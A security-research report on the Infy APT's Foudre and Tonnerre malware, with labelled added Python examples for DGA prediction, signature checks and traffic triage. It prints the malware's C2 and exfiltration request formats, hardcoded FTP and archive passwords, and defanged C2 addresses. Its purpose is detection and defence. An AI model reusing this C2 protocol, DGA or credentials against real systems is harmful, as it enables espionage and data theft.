Feb 8, 2021

After Lightning Comes Thunder

The Most Persistent Iranian APT Rumbling Again


Cyber warfare has long become a common practice in the arsenal of governments, armies, and intelligence agencies around the world. What was once a black art, reserved for the elite of the elite and conducted by few, has become a land of opportunities for almost any government. Iran is no exception to this trend, with new discoveries made every year repeatedly attributed to the Islamic Republic.

One of the earliest Iranian cyber operations ever brought to light was “Infy” (aka “Prince of Persia”). Evidence of its activity dates back to 2007. The operation was very active from its early stages, was shown to target victims mainly in Iran and throughout Europe, and was likely government-backed.

In this research, a cooperation between SafeBreach Labs and Check Point Research, we identify evidence of renewed activity by this operation. It seems that after a long period of dormancy, the operators regrouped, fixed earlier mistakes, and substantially improved their OPSEC as well as their technical proficiency and tooling.

This report sheds new light on this long-lasting Iranian cyber operation, revealing the new techniques used, the underlying infrastructure, stealth techniques and other new elements of this actor’s modus operandi.

Key findings:

  • A new, previously unknown, second stage malware with extended capabilities.
  • A more mature form of the known “Infy” malware family.
  • A review of recent C2 infrastructure including HTTP/FTP servers and RSA signatures.


In 2016, Palo Alto Networks’ Unit 42 discovered Infy, an APT presumed to be Iranian with an interesting choice of targets, among them the US government and Israeli companies. The operation’s activity was traced back to 2007. Around the same time, Qi-Anxin focused on a specific attack targeting Danish diplomats and named it Operation Mermaid; it covered the same methods and infrastructure.

After the publication, Unit 42 decided to conduct a takedown operation. This gave the researchers more visibility about the origin of victims, the motive of the attackers and the scope of the attack. The data gathered reaffirmed the Iranian connection – most victims were either in Iran, or were Iranian dissidents, and the attackers did not seem to be financially motivated. As a result of the takedown Infy lost access to almost all of the campaign victims.

Research by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution. The threat group compromised two news websites related to Jundallah as early as 2010, and exploited ActiveX vulnerabilities to attack the websites’ visitors. Infy seemed to have operated heavily around the 2013 Iranian Presidential elections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society members and activists afterwards.

Guarnieri & Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication Company of Iran blocked and redirected any traffic originating from Iran and aimed at Palo Alto’s sinkholes. This was probably a deliberate attempt by the actors to reduce visibility and regain control of the victims. This is not an ability demonstrated by most threat actors (indeed, we are hard-pressed to find precedent for it), and it suggests a potential connection to the Iranian government.

Following these events, the operation wound down until August 2017, when Infy’s activity was observed again, this time through the use of a new malware dubbed Foudre.

Recent activity – lightning strikes again

During the first half of 2020, new versions of Foudre emerged with new documents designed to lure victims. These operated slightly differently than before: instead of having the victim click on what appears to be a link to a video, the document carries a macro that runs once the victim closes it.

Figure 1: Full infection chain

Figure 2: Example of a document sent to potential victims

One document (Figure 2) contained a photo of Mojtaba Biranvand, the governor of Dorud city in Lorestan Province, Iran. The document is in Persian and includes information regarding the governor’s office and his phone number (the number actually belongs to a lawyer in Lorestan).

Another document, also in Persian, contains the logo of ISAAR, the Iranian government-sponsored Foundation of Martyrs and Veterans Affairs which provides loans to disabled veterans and families of martyrs.

Figure 3: ISAAR document sent to potential victims

When the victim opens the document, a macro extracts the embedded package to the temp directory as fwupdate.temp and executes it after the document closes.

In 2018 Intezer covered Foudre version 8, which included a sample labeled “unknown binary” that was not explored in Intezer’s research. In fact, this was a new component, called Tonnerre, which marked a new step in the evolution of Infy and contained functionality absent from Foudre alone.


We used several methods to try and determine the current victims of Foudre & Tonnerre.

The first was registering the DGA domains ourselves and logging incoming connections together with the parameters the malware sent. We filtered out repeat connections, which are not typical of the malware’s behavior (these could be traffic generated by researchers; we can only speculate). Only a few dozen victims contacted our servers.

A curious point is that none of these victims were Iranian, which may indicate the attackers learned from the takedown and had the DNS records in Iran changed preemptively (although this, again, is purely speculation).

The second method we used to probe the campaign was passive DNS. That way we were able to see a broader scope of the attack. For example, we could see if some IP address was the origin of several resolution requests in succession, and in some cases if the connectivity check occurred right before attempting to connect to the C2 server. Ignoring traffic which doesn’t correlate with the correct dates for the domain, we were left with a handful of new victims. Two targets with persistent connectivity, as well as a connectivity check prior to contacting the C2, were in Turkey – one belongs to a University, and the other belongs to a state owned investment bank.

Below is the distribution of victims by geolocation. These correlate with previous findings on Infy, except for the glaring absence of Iranian victims.

Figure 4: Victim distribution by country

Foudre Known Versions

Version        Timestamp              Notes
Foudre 1-2     February 2017          Discovered by Palo Alto Networks in 2017
Foudre 3       October 2017
Foudre 7       Probably April 2018    Newly discovered
Foudre 8       August 2018            Discovered by Intezer in 2018
Foudre 20      April 2020             Newly discovered
Foudre 21      July 2020
Foudre 22      October 2020

Foudre Version Differences

Most differences include minor technical detail, such as Window names, Export function names and strings. However the latest versions of Foudre include some key differences:

  • DGA Formula – The updated algorithm computes a CRC32 of the string NRV1{}{}{}.format(date.year, date.month, weeknumber), with a start date of December 27, 2018. The possible TLDs are .space, .net and .top. This change is probably meant to evade detection by security vendors relying on the previously published DGA.
  • C2 RSA Verification – Foudre verifies the server is authentic by downloading a signature file, signed by the server and verifying it. This makes the operation more resilient against third-party takedowns.
  • Foudre string not present – In previous versions the window which was used for keylogging was named “Foudre”, which brought the malware its name. In the latest version, this was changed to “Form1”. This change could help the malware evade signature detection (and generally, this sort of thing should be kept in mind when writing signatures).

Figure 5 – Foudre version 20

Embedded articles

One of the discoveries that caught our eye during the analysis was a unique piece of text embedded in each of the binaries. This text was copied from various media websites from around the time the binary was released, which gives a lower bound on the build date: a sample cannot be older than the article it embeds.

Foudre version 21 included a text from an article published on July 29.

Figure 6 – July 2020 article embedded into Foudre version 21

Foudre version 22 contained the following text, taken from an article published by the BBC:

Figure 7 – October 2020 article embedded into Foudre version 22

After connecting to the C2, Foudre downloads an encrypted self-extracting archive (SFX), then decrypts and runs it. The SFX includes an executable and an RSA public key.

Tonnerre – Second-Stage Payload

Foudre’s new versions were downloading Tonnerre 11 as the payload, but we also tracked the first two versions. Version “10” is actually the earliest sample, and was dropped by Foudre 8. For more information, see Appendix B.

Version           Time of emergence      Notes
10 (MaxPinner)    August 2018            Dropped by Foudre 8
1                 September 2018         Newly discovered
2                 March 2019             Newly discovered
11                Probably July 2020     Newly discovered, latest version

Tonnerre is used to expand the functionality of Foudre; possibly its functionality was put into a separate component to make sure it is deployed only when needed, and meets fewer prying eyes. Like Foudre, it is written in Delphi.

Its capabilities:

  • Steals files from predefined folders as well as external devices.
  • Executes commands from the C2 server.
  • Records sound.
  • Captures screen.

The executable is exceptionally large at 56 MB, and camouflages itself as legitimate software.

Version 1 is camouflaged as “SilverSoft Speed”, and version 11 as “Synaptics”.

Figure 8 – Tonnerre v.1 – Silversoft Speed

Like Foudre, Tonnerre has embedded strings from news articles which reinforces the notion that both tools come from the same developers.

Figure 9 – Tonnerre version 11 hardcoded strings

Similar to Foudre, Tonnerre uses a DGA to find its C2, and verifies it as a valid server using an RSA signature, which is decrypted with the public key from the SFX. Tonnerre uses this C2 to:

  • Store general metadata about the victim
  • Steal files with predefined extensions
  • Download updates.
  • Get an additional C2.

The second C2 is used to store the stolen data, and it can also provide a list of commands to run.

Communication to the first C2 uses HTTP, whereas the second C2 communicates using FTP. The FTP password is hardcoded in the malware, but the username is the name of the victim’s computer, which was previously sent to the HTTP C2.
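To make the takedown-resistance point concrete (the C2 RSA verification step listed under the Foudre version differences, and the same check in Tonnerre described just above), here is an added Python example that is not code from the report or from the malware. It models the exchange with textbook RSA over fixed Mersenne primes (illustration only: no padding, never use it for real keys) and assumes the server signs the request parameters d and t, since the report does not say what exactly is signed; operator_server and sinkhole_server are hypothetical names for the two kinds of server a DGA domain can resolve to.

```python
import hashlib

# Toy textbook RSA over known Mersenne primes. Illustration only: no padding,
# fixed primes, no standard hash-to-integer encoding. Never use for real keys.
MERSENNE = {
    521: (1 << 521) - 1,
    607: (1 << 607) - 1,
    1279: (1 << 1279) - 1,
    2203: (1 << 2203) - 1,
}
E = 65537


def _modinv(a, m):
    """Modular inverse of a mod m via the extended Euclidean algorithm."""
    r0, r1, s0, s1 = a, m, 1, 0
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError("no inverse")
    return s0 % m


def make_keypair(p, q, e=E):
    """Returns ((n, e), (n, d)) for the two primes p and q."""
    n = p * q
    return (n, e), (n, _modinv(e, (p - 1) * (q - 1)))


def _digest_int(data):
    # SHA-256 is 256 bits, far below every modulus used here, so no reduction is needed.
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def sign(priv, data):
    n, d = priv
    return pow(_digest_int(data), d, n)


def verify(pub, data, sig):
    n, e = pub
    return 0 < sig < n and pow(sig, e, n) == _digest_int(data)


# The operator's key pair; the public half is what ships inside the SFX.
OPERATOR_PUB, OPERATOR_PRIV = make_keypair(MERSENNE[521], MERSENNE[607])
# A sinkhole operator can register the DGA domain but has to use its own key.
SINKHOLE_PUB, SINKHOLE_PRIV = make_keypair(MERSENNE[1279], MERSENNE[2203])


def operator_server(challenge):
    """The real C2: answers the signature-file request with a signature it can produce."""
    return sign(OPERATOR_PRIV, challenge)


def sinkhole_server(challenge):
    """A takedown sinkhole: best it can do is sign with a key the client does not trust."""
    return sign(SINKHOLE_PRIV, challenge)


def client_trusts(server, embedded_pub=OPERATOR_PUB):
    """Client side of the /s/?d=<days>&t=<timestamp> step: build the challenge,
    fetch the 'signature file', verify it against the embedded public key.
    ASSUMPTION: the signed message is the request parameters (constructed values)."""
    challenge = "d={}&t={}".format(1101, 1595840000).encode("ascii")
    sig = server(challenge)
    return verify(embedded_pub, challenge, sig)


if __name__ == "__main__":
    print("real C2 accepted:", client_trusts(operator_server))
    print("sinkhole accepted:", client_trusts(sinkhole_server))
```

The client ends up trusting only a server that holds the private key matching the public key shipped in the SFX, so registering the DGA domain, as Unit 42 did in 2016, is no longer enough. One caveat for anyone attempting a takedown or sinkhole: if the signed message were static rather than bound to the request values, a captured signature file could simply be replayed by the sinkhole.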

Appendix A – Tonnerre deep dive


The malware contains 5 Delphi forms, with each one responsible for a different capability:

Form1 – Malware Installation and upgrading process.

The malware runs for the first time with param /set <machine GUID in hex>, creates an installation folder and copies itself as helper.exe. The second installation stage creates a link and runs its persistence mechanism:

  • A scheduled task for helper.exe -ex <machine GUID in hex>.
  • Registry “Run” key.

Running it with a wrong GUID, or on another machine, fails because the malware verifies that GUID value. It also verifies that the Faronics Deep Freeze process (dfserv.exe) is not running; otherwise Tonnerre exits immediately. Tonnerre also checks for the presence of Kaspersky endpoint protection by looking for a “Kaspersky Lab” folder under %programfiles%. If this folder exists, the malware tries to avoid detection by sleeping for a while after setting its persistence.

Form2 – Collects files from predefined folders – Documents, Downloads, Pictures and more. It also sets a notify event for specific file types like MS Word files.

Files are also collected from network shares using WNetOpenEnumW and WNetEnumResourceW functions from mpr.dll. Print screens are also collected if the screen saver is not active at the moment of checking.

Form3 – Connects to an FTP server to exfiltrate collected data and get further commands.

Form4 – Collects files from removable devices for exfiltration. This is done by monitoring WM_DEVICECHANGE messages and enumerating the devices.

Form5 – Uses the lame command line tool to record sound. This is somewhat similar to another Iranian-attributed APT, Nazar, which used it as a DLL; despite this similarity, there doesn’t seem to be a link between the groups. The exact command line is: lame.exe -b 8 -m m rvfrtc8.tmp fcvd10v.tmp (8 kbit/s, mono: a very low bitrate, which keeps the recordings small for exfiltration).

C2 Communication


The DGA start date is December 25, 2017, and the possible TLDs are .site, .com and .win.

The domain is derived from the following formula: NITV1{}{}{}.format(date.year, date.month, weeknumber)

One of the generated C2 servers is Like all other domains since March 2020, this was resolved to the IP address 185.141.61[.]37.

The malware uses to get the current date for the DGA.
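Both DGAs described in this report (Foudre 20-22: prefix NRV1, start date December 27, 2018, TLDs .space/.net/.top; Tonnerre 11: prefix NITV1, start date December 25, 2017, TLDs .site/.com/.win) reimplemented in Python, as an added example that is neither the report’s code nor the malware’s. Two details the report does not state are marked as assumptions in the code: the CRC32 is rendered as eight lowercase hex digits (consistent with DGA labels such as eab6ff48 cited later in this report), and weeknumber is taken as the number of whole weeks since the start date. Since the TLD selection rule is also not given, all three candidates are emitted for each week.

```python
import re
import zlib
from datetime import date, timedelta

# DGA parameters as stated in the report. The weeknumber derivation and the
# TLD selection rule are NOT given in the report; see the ASSUMPTION notes below.
FAMILIES = {
    "foudre":   {"prefix": "NRV1",  "start": date(2018, 12, 27), "tlds": ("space", "net", "top")},
    "tonnerre": {"prefix": "NITV1", "start": date(2017, 12, 25), "tlds": ("site", "com", "win")},
}


def _as_date(day):
    """Accepts a date or an ISO string such as '2020-04-15'."""
    return day if isinstance(day, date) else date.fromisoformat(day)


def week_number(day, start):
    """ASSUMPTION: weeknumber = whole weeks elapsed since the DGA start date."""
    day, start = _as_date(day), _as_date(start)
    if day < start:
        raise ValueError("date precedes the DGA start date")
    return (day - start).days // 7


def dga_seed(family, day):
    """'<prefix><year><month><weeknumber>', exactly as the report's format string builds it
    (no zero padding, because str.format of an int adds none)."""
    p = FAMILIES[family]
    day = _as_date(day)
    return "{}{}{}{}".format(p["prefix"], day.year, day.month, week_number(day, p["start"]))


def dga_label(family, day):
    """CRC32 of the seed rendered as eight lowercase hex digits (ASSUMPTION, consistent
    with the 8-hex-digit DGA labels seen in this report)."""
    crc = zlib.crc32(dga_seed(family, day).encode("ascii")) & 0xFFFFFFFF
    return "{:08x}".format(crc)


def dga_domains(family, day):
    """All candidate C2 hostnames for the week containing `day`, one per possible TLD."""
    return ["{}.{}".format(dga_label(family, day), tld) for tld in FAMILIES[family]["tlds"]]


def upcoming_domains(family, first_day, weeks):
    """Candidate domains for `weeks` consecutive weeks starting at `first_day`, e.g. for
    pre-registration or blocklist generation. Returns [(week_start_iso, [domains]), ...]."""
    first_day = _as_date(first_day)
    out = []
    for i in range(weeks):
        day = first_day + timedelta(days=7 * i)
        out.append((day.isoformat(), dga_domains(family, day)))
    return out


_LABEL_RE = re.compile(r"^[0-9a-f]{8}$")


def is_candidate(hostname):
    """Cheap structural filter for DNS logs: an 8-hex-digit label directly under one of the
    TLDs used by either family. A structural match is a lead to correlate against the
    per-week list, not a verdict on its own."""
    label, _, tld = hostname.lower().rstrip(".").rpartition(".")
    return bool(_LABEL_RE.match(label)) and any(tld in f["tlds"] for f in FAMILIES.values())


if __name__ == "__main__":
    for week_start, domains in upcoming_domains("foudre", "2020-04-02", 3):
        print(week_start, domains)
```

upcoming_domains produces the list a sinkhole operator would pre-register or a defender would blocklist for the coming weeks; is_candidate is the filter to run over DNS logs first. Note that it deliberately does not cover the .stream TLD seen with Foudre 3, which is outside the two TLD sets the report gives for the current versions.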

Receiving Executable Updates

First, just like Foudre, the malware verifies the HTTP C2 server by downloading a signature file using the following GET request: /s/?d=<days from first date>&t=<timestamp>

Next, after verifying the C2, the malware downloads the second signature file:

GET /2017/?c=<comp-name>&u=<user-name>&v=00011&f=fdir1&mi=<machine-guid>&t=<timestamp> HTTP/1.1

The C2 server responds with an HTTP redirect whose Location header is update32.sig, so the signature file is then downloaded from /2017/update32.sig.

Finally, a request is sent to 2016/update32.tmp (this URL was not responsive when we checked). An SFX is downloaded, decrypted and executed, using a random-looking password (in our case it was TtckjcAa54cE).

Getting the FTP Server

The malware gets the C2 FTP server IP address by sending the following request to the C2 server: GET /f/?c=<computer-name>&mi=<machine-guid>&t=<timestamp> HTTP/1.1

The C2 answers with the same HTTP redirection mechanism, with a Location of the form <year><days since the first DGA day>.tmp, for example 2020209.tmp.

It then performs a GET request to /f/2020209.tmp. Example for a downloaded file:





This file has 3 parts:

  1. The obfuscated FTP server. The IP could be retrieved easily using a python one-liner: print(bytes([ch-1 for ch in b'266/:5/321/93'])) which gives 155[.]94[.]210[.]82.
  2. An RSA signature of the FTP server.
  3. List of open ports on the FTP server.

From this point on, the malware uses that server to fetch its next command. After executing the command, the output is uploaded using FTP as well.

FTP Protocol


The malware connects to the FTP server using its computer name as the username and one of two fixed passwords: tpass15A42 or tpass14A43. The password can be decoded using the same Python snippet used for getting the FTP server.

Figure 10 – Deobfuscated FTP passwords

Command Execution

Commands are fetched by downloading a command file from the FTP server. We were able to enumerate the following commands:

  • MyIdle
  • MyDelete
  • MyRename
  • MyRun
  • MyEndTask
  • MyZip
  • MyShell
  • FTP – GET
  • FTP – PGET – get multiple files.
  • FTP – PUT – upload a file.
  • FTP – upload dirlist (using FTP PUT)

Dual Data Exfiltration

Exfiltration of data which was collected based on the C2 server command is performed via FTP. Exfiltration of data collected otherwise (built in Tonnerre logic) is performed via HTTP POST request:

POST /blog/?<timestamp> HTTP/1.1

with the following fields in the body:

c=<computer-name>&u=<user-name>&v=00011&f=fdir1&mi=<machine-guid>&txt=<exfil data>&e=EOF

The C2 server response to a valid exfiltration is deliberately misleading: “There is a problem, the page you requested does not exist”.

The server also returns a custom 404 error page when a valid directory is requested: “Not Found. The requested URL was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”

Tonnerre searches for files based on the file extension:

Figure 11 – file types Tonnerre exfiltrates

Exfiltrated files

Exfiltrated files are named in the following format:

<file name crc32>-<file size>-<modified timestamp>-<created timestamp>

e.g. ceb60f97-53807-1597696028-1360110435. The exfiltrated data is a WideChar array and should end with the following suffix:

<Computer name><user-name><version><directory><machine-guid><exfil file path>

The data is base64 encoded before being put into the message body. The content is the base64-encoded, zlib-compressed (not encrypted) file content, followed by the file’s metadata in hex: computer name, username, Tonnerre version, upload directory on the C2 server, machine GUID and the file path on the victim’s machine.
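An added Python example (not code from the report or the malware) that recognizes the request shapes documented above for Tonnerre (the /s/, /2017/ and /f/ GETs and the /blog/ exfiltration POST) as well as Foudre’s /de/ and /2015/ requests from Appendix B, and decodes the exfiltrated-record name format. The field names come from the report; the sample requests, host names and GUIDs are constructed, and the CRC32 in build_record_name is assumed to be computed over the UTF-8 bytes of the bare file name, which the report does not specify.

```python
import re
import zlib
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit


def _fields(qs):
    """First value of every query/body field, keeping empty values such as 'd2020209.sig'."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def classify(method, path, body=None):
    """Return (kind, details) for one request, or None if it matches no documented shape."""
    parts = urlsplit(path)
    base, q = parts.path, _fields(parts.query)
    if method == "GET" and base == "/s/" and {"d", "t"}.issubset(q):
        return "c2_signature_check", {"days": q["d"]}                      # Tonnerre
    if method == "GET" and base == "/de/" and {"v", "t"}.issubset(q):
        return "c2_signature_check", {"version": q["v"]}                   # Foudre
    if method == "GET" and base in ("/2017/", "/2015/") and {"c", "u", "v", "mi"}.issubset(q):
        # /2017/ is Tonnerre's update check, /2015/ Foudre's; only Foudre carries s=<campaign>
        return "update_check", {"version": q["v"], "campaign": q.get("s"),
                                "host": q["c"], "guid": q["mi"]}
    if method == "GET" and base == "/f/" and {"c", "mi", "t"}.issubset(q):
        return "ftp_server_lookup", {"host": q["c"], "guid": q["mi"]}
    if method == "POST" and base == "/blog/" and body is not None:
        b = _fields(body)
        if {"c", "u", "v", "mi", "txt"}.issubset(b) and b.get("e") == "EOF":
            return "exfil_post", {"version": b["v"], "host": b["c"],
                                  "guid": b["mi"], "txt_len": len(b["txt"])}
    return None


def triage(requests):
    """Run classify over (method, path, body) tuples; returns the hits, in order."""
    hits = []
    for method, path, body in requests:
        r = classify(method, path, body)
        if r is not None:
            hits.append(r)
    return hits


_RECORD_RE = re.compile(r"^([0-9a-f]{8})-(\d+)-(\d+)-(\d+)$")


def parse_record_name(name):
    """Decode '<crc32 of file name>-<size>-<mtime>-<ctime>' (epoch seconds, read as UTC)."""
    m = _RECORD_RE.match(name)
    if not m:
        return None
    crc, size, mtime, ctime = m.groups()
    return {"name_crc32": crc, "size": int(size),
            "modified": datetime.fromtimestamp(int(mtime), tz=timezone.utc),
            "created": datetime.fromtimestamp(int(ctime), tz=timezone.utc)}


def build_record_name(file_name, size, mtime, ctime):
    """Inverse of parse_record_name. ASSUMPTION: CRC32 over the UTF-8 bytes of the bare name."""
    crc = zlib.crc32(file_name.encode("utf-8")) & 0xFFFFFFFF
    return "{:08x}-{}-{}-{}".format(crc, size, mtime, ctime)


# Constructed sample traffic modelled on the request formats in the report.
GUID = "0123456789abcdef0123456789abcdef"
SAMPLE_REQUESTS = [
    ("GET", "/s/?d=1101&t=1595840000", None),
    ("GET", "/2017/?c=DESKTOP-A1B2&u=user1&v=00011&f=fdir1&mi=" + GUID + "&t=1595840001", None),
    ("GET", "/f/?c=DESKTOP-A1B2&mi=" + GUID + "&t=1595840002", None),
    ("GET", "/de/?d2020209.sig&v=00020&t=1595840003", None),
    ("GET", "/2015/?c=DESKTOP-A1B2&u=user1&v=00020&s=Test201&f=datadir1&mi=" + GUID + "&b=64&t=1595840004", None),
    ("POST", "/blog/?1595840005",
     "c=DESKTOP-A1B2&u=user1&v=00011&f=fdir1&mi=" + GUID + "&txt=SGVsbG8%3D&e=EOF"),
    ("GET", "/index.html", None),
]


if __name__ == "__main__":
    for kind, details in triage(SAMPLE_REQUESTS):
        print(kind, details)
    print(parse_record_name("ceb60f97-53807-1597696028-1360110435"))
```

The v and s fields are the most useful pivots: v identifies the malware version (00011 for Tonnerre 11, 00020 for Foudre 20) and s the campaign name discussed in Appendix B, while mi ties every request from one victim together across both C2 stages.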

File and input capture and collection

The malware creates several directories to store the stolen files: “R”, “F”, “H”, “V”, “S”, “G”.

Figure 12 – The list of directories used for exfiltrated data: R,F,H,V,S

G = Grabbed (files from recycle bin)

.doc files grabbed from the recycle bin.

F = Fixed (all .doc files from supported drive types)

The drive types that are supported: fixed, remote, ramdisk, removable

S = Screen

Saved as psf files (Print Screen File).

H = Files from predefined folders and network shares

Files from user directories (downloads, pictures, contacts) and from network shares are saved in H.

R = Recent files

Files that were written to the “Recent Items” folder, as enumerated in the Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Recent registry key.

V = Voice Recording

Used for the voice recordings generated by Form 5.

Appendix B – Foudre deep dive

Foudre version 20-22

C2 Protocol

As we showed previously, the C2 server is first authenticated by downloading a signature file, obtained with the following HTTP GET request:

GET <C2 server host name>/de/?d2020209.sig&v=00020&t=<timestamp> HTTP/1.1

The server does HTTP redirection with the following value:

Location: <C2 server host name>/2020209.sig

This creates a GET request on this location:

GET /de/<C2 server host name>/2020209.sig HTTP/1.1

After the C2 server is verified as trusted, the malware checks for new versions of itself by trying to download a second signature file, using the following GET request:

https://<C2 server host name>/2015/?c=<computer name>&u=<username>&v=00020&s=Test201&f=datadir1&mi=<machine guid>&b=<os 64/32 bit arch>&t=<timestamp>

Figure 13 – July 2020 article embedded into Foudre version 21

The C2 server returns a signature file named t00011-3.sig, which refers to Tonnerre version 11. The final step is performing a request to download the latest version of the malware:

GET /2014/t00011-3.tmp HTTP/1.1

Figure 14 – July 2020 article embedded into Foudre version 21

The server responds with an encrypted RAR SFX file with the password RBA4b5a98Q. After decryption, we got Tonnerre version 11 and a public key file. The malware is 56 MB in size, which is unusual for malware samples and may help it avoid detection: many vendors skip large files and won’t scan or monitor them.

Tonnerre 11 is the latest version served from the c2 as of our research. It has been using the exact same update file since at least as early as 27/7/20, and until at least as late as 14/11/20.

The path of the embedded object, C:\Users\Alex\AppData\Local\Microsoft\Windows\INetCache\Content.Word\, was also used in an earlier Word dropper which drops Foudre version 21:

Figure 16 – The embedded path into Version 21 document

Campaign Names

When we observed the HTTP requests, we could see the value of the s parameter, e.g. “TehN005”, which seems to have served as a sort of campaign ID:


Foudre Ver. 1 – 2017FSU

Foudre Ver. 2 – 17weh44 – (probably 2017 week 44)

Foudre Ver. 3 – af17818 – (probably 18/8/17) – was downloaded from the C2 https://eab6ff48[.]stream/update/af17818.tmp, which resolved to 185.148.144[.]3 (VirusTotal); that IP also resolved to another host name, meaning Foudre was also downloaded from an additional host name of the form <dga hostname>.stream. It was probably sent by email (VirusTotal 2017-10-06 14:13:29, 59bbae76 – email).

Foudre Ver. 4/5 – DynuSub (probably refers to the C2 domain

Foudre Ver. 7- S180313 – (probably 13/3/18)

Foudre Ver. 11 – Rec11-1 – (probably Recording version 11)

Foudre Ver. 20 – Test201 (Test 1 version 20)

Foudre Ver. 21 – TehN002 – (probably version Number 2)

Foudre Ver. 22 – TehN005 – (probably version Number 5)

SFX File

The executable file dropped by the above macros is an SFX File – Self-Extracting archive. When we decompress it, we get an extraordinary executable size – 275 MB.

Figure 17 – SFX content of Foudre 21

It uses rundll to load conf4389.dll (Foudre loader), which in turn runs DLL d488 and calls an exported function named f8754. The loader also creates a persistence mechanism by scheduling a task to run itself again.

Foudre 8 – Tonnerre first occurrence

As mentioned previously, Tonnerre was already deployed in Foudre version 8 that was featured in Intezer’s publication.

The attack vector chosen was an SFX embedded into an office document. In the later versions that we analyzed, the contents of the SFX were different.

Figure 18 – Content of Foudre 8 SFX c38533b85e4750e6f649cc407a50031de0984a8f3d5b90600824915433a5e218

The new SFX includes the following files:

  • I7234.dll is the initial loader.
  • d388 is the first loaded dll as Foudre version 8.
  • dfbpbtge.tmp is a sample with different capabilities, the successor of the earlier “Infy M”, used as a second-stage payload.

Figure 19 – dfbptge.tmp – Tonnerre/“Max Pinner”

This loader executes what was defined by Intezer as an unknown binary. The execution of this binary happens only in the absence of the process dfserv.exe, which belongs to Faronics’ Deep Freeze.

The payload also checks if previous versions of this malware family are already installed on the victim’s computer. The check is done by searching for the window name Tonnerre from version 1 to 9.

The C2 server has a fixed hardcoded address instead of the usual DGA algorithm used by Foudre. The decrypted C2 is which probably explains why this version was named MaxPinner internally.

Figure 20 – dfbptge.tmp – Tonnerre appears for the first time

Figure 21 – dfbptge.tmp – fixed C2 server –

Foudre 7 – previously unknown

The SFX is quite different from other versions: it includes an all-white bitmap, Thumbs.bmp, of 63 MB, probably to inflate the size of the SFX. There is also a third DLL, r3066, which is only used to call the D2 export of the main Foudre DLL d392 instead of calling it from the loader DLL i7765.dll.

The decoy movie is violent and is called shkanje46.mp4, which in Persian means trigger46 (another hint at both the attackers’ attribution and the victims’ native language). Foudre 7 is the last version that used string obfuscation.

Figure 22 – Content of Foudre 7 SFX

Appendix C – IOCs


Foudre 3 dll


Foudre 4 dll




Foudre 5 dll



Foudre 7 dll


Foudre 11 dll


Foudre 20 dll


Foudre 21 dll


Foudre 22 dll

6931EE281C895BB9446689C8CB648E2ED353B06D454CFB4418490EF82CA07BF1 4853a8acc62d6586eddfb30dcbb97ffa82c5f65460708fd3a969c88e29f99160

impHash Foudre version 21-22 dll 78d9bed21db68b9d8c53b8f62bc5314f

Tonnerre 1 exe


Tonnerre 2 exe


Tonnerre 11 exe


Malicious Word doc with macro dropper
Version 22 dropper b97960c29b7c8234981728b80060a42dbe32bf625b052854a6cc2175467cca89

Version 21 dropper ccbda8a84dbeda1a66780c76fd9f507778c9fb992c7eee87e99cc3ca314009ee

Foudre SFX

Version 3


Version 7


Version 21


Version 22


Foudre Loaders

Version 7

Version 21 conf3234.dll


Version 22 conf4389.dll 9F64EC0C41623E5162E51D7631B1D29934B76984E9993083BDBDABFCCBA4D300

Version 22: identical to conf4389 but with the suffix chopped (1.1 MB instead of 4.3 MB)


All have imphash: 39507b319f55d0fec705f6dea39a0dfb

Tonnerre SFX


Tonnerre cert file


Foudre 20 C2 domains:



















Tonnerre 11 C2 domains:








IP Addresses
HTTP Servers
Foudre – active since 15/12/2020 – was active until 15/12/2020

Tonnerre – active since 6/1/21 – active until 6/1/21

FTP Servers – new server since 30/12/20

RSA Certificates

Tonnerre Public Certificate file content

4E 0A 4C 6F 63 6B 42 6F 78 33 01 00 00 00 03 00 01 00 00 51 F0 00 D8 97 48 C7 5B 0A BF F4 98 AB C6 1F 28 13 FC D7 C5 5E E4 A6 71 E

Bytes 4C 6F 63 6B 42 6F 78 33 spell the ASCII marker “LockBox3”, the key serialization format of the TurboPower LockBox 3 Delphi cryptography library, consistent with the malware being written in Delphi.

Foudre 20 embedded public key

